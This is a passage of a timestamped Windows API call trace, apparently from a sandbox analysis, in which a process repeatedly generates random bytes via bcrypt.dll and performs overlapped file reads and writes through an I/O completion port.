cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.807] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.807] free (_Block=0x3e305b8) [0158.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.807] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.808] free (_Block=0x1fa91d0) [0158.808] free (_Block=0x1fa2ed8) [0158.808] free (_Block=0x1fa90b8) [0158.808] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.810] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.811] CloseHandle (hObject=0x3cc) returned 1 [0158.811] free (_Block=0x3df0008) [0158.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.821] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.821] free (_Block=0x3e305b8) [0158.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.821] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.822] free (_Block=0x1fa91d0) [0158.822] free (_Block=0x1fa2ed8) [0158.822] free (_Block=0x1fa90b8) [0158.822] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.823] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.838] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4180, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.839] CloseHandle (hObject=0x3cc) returned 1 [0158.839] free (_Block=0x3df0008) [0158.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.861] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.861] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.861] free (_Block=0x3e305b8) [0158.862] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.862] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.862] free (_Block=0x1fa91d0) [0158.862] free (_Block=0x1fa2ed8) [0158.862] free (_Block=0x1fa90b8) [0158.862] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.871] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.871] free (_Block=0x3e305b8) [0158.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.872] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.872] free (_Block=0x1fa91d0) [0158.872] free (_Block=0x1fa2ed8) [0158.872] free (_Block=0x1fa90b8) [0158.872] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.877] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.891] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.892] free (_Block=0x3e305b8) [0158.892] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.892] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.892] free (_Block=0x1fa91d0) [0158.892] free (_Block=0x1fa2ed8) [0158.892] free (_Block=0x1fa90b8) [0158.892] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.905] free (_Block=0x3e305b8) [0158.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.906] free (_Block=0x1fa91d0) [0158.906] free (_Block=0x1fa2ed8) [0158.906] free (_Block=0x1fa90b8) [0158.906] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0158.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.920] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x24e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0158.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.930] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.930] free (_Block=0x3e305b8) [0158.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.930] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.930] free (_Block=0x1fa91d0) [0158.930] free (_Block=0x1fa2ed8) [0158.930] free (_Block=0x1fa90b8) [0158.930] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.984] CloseHandle (hObject=0x2a8) returned 1 [0158.984] free (_Block=0x3f70048) [0158.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0158.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0158.986] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.986] free (_Block=0x3e305b8) [0158.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.986] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.986] free (_Block=0x1fa91d0) [0158.986] free (_Block=0x1fa2ed8) [0158.986] free (_Block=0x1fa90b8) [0158.986] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0158.990] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.013] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x52c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.024] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.025] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.025] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.025] free (_Block=0x3e305b8) [0159.026] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.026] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.026] free (_Block=0x1fa91d0) [0159.026] free (_Block=0x1fa2ed8) [0159.026] free (_Block=0x1fa90b8) [0159.026] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.040] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.040] free (_Block=0x3e305b8) [0159.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.040] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.041] free (_Block=0x1fa91d0) [0159.041] free (_Block=0x1fa2ed8) [0159.041] free (_Block=0x1fa90b8) [0159.041] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.057] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.057] free (_Block=0x3e305b8) [0159.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.057] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.057] free (_Block=0x1fa91d0) [0159.057] free (_Block=0x1fa2ed8) [0159.057] free (_Block=0x1fa90b8) [0159.057] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.072] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.072] free (_Block=0x3e305b8) [0159.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.072] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.073] free (_Block=0x1fa91d0) [0159.073] free (_Block=0x1fa2ed8) [0159.073] free (_Block=0x1fa90b8) [0159.073] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.073] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.083] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.083] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.083] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.083] free (_Block=0x3e305b8) [0159.083] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.083] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.084] free (_Block=0x1fa91d0) [0159.084] free (_Block=0x1fa2ed8) [0159.084] free (_Block=0x1fa90b8) [0159.084] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0159.084] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.303] CloseHandle (hObject=0x2a8) returned 1 [0159.304] free (_Block=0x3f70048) [0159.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.305] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.305] 